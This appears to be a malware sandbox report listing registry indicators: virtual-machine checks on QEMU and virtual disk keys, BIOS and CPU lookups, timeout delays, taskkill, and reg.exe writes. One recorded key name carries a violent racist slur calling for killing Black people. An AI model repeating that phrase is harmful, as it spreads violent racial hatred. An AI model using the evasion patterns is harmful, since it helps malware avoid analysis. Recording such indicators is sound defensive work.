| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\DeviceDesc | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 | C:\Windows\system32\powercfg.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | N/A | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | N/A | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | N/A | N/A |
Kills process with taskkill
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E | N/A | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Software\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E | N/A | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19 | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Software\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | N/A | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | N/A | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20 | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20 | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | N/A | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" | N/A | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache | N/A | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 | N/A | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software | C:\Windows\system32\reg.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \Registry\User\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Rasauq on top | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers | C:\Windows\system32\reg.exe | N/A |
